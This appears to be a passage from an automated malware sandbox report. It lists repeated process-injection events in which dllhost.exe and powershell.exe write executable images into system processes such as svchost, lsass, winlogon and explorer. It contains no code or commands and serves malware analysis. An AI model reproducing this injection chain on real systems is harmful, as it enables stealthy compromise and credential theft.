Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B421F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B421F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24D756E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24D75710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F0C6720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F0C6750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1EBD5460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1EBD5490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B4448A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B4448D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FE3A940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DC10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FE3BA50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B6C0940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B6C0990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 18FE8A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2C9A6100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2C9A6150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0D9CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0F4010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1ACC50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1ACD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F188E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA71D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25791060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA73E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4084 base: 8260000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4084 base: 8260000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7624Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2384
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 7624 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 8500000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 509BC5A010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22382770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 269BA660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22055340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8260000
